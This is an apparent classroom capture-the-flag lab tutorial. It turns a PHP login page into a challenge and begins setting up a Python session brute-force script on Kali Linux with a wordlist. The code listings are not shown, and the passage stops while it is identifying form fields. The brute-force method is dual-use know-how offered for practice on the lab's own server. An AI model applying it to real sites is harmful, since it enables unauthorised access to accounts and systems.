In Lab 13, we built a webpage that does the following:
- Allows the user to log in using a set of hard-coded credentials
- This isn't good and should never be done.
- Sets and checks a session variable that allows the webserver to determine whether credentials were typed correctly on the login page.
This lab aims to use the previous web application to create the type of CTF you might encounter in a competitive event.
Let’s build in a check to hackme.php that does the following:
- If the user is logged in:
- The web server will look for a secret POST parameter value
- If the post parameter is correct, it will reveal the flag.
- The flag will never be revealed if the user is not logged in.
Modify hackme.php to look like this:
Let’s write the exploit code next.
First, you’ll want to create a folder on your Kali Linux VM called Lab_14 and a file called session_brute.py.
Copy raft-small-words.txt to this folder or grab it. (Directions here if needed)
Your lab_14 folder should look like this:
ls
Any time you brute force a website that requires you to have an established session, you’ll want to identify the form fields that are being used when the user logs in to create that session. Here is what our index.php looks like if we ‘view page source’ in our web browser.
Based on this, we know the following:
- The data is sent via a POST request to
check.php (<form method=”post”>)
- The first field is called ‘username’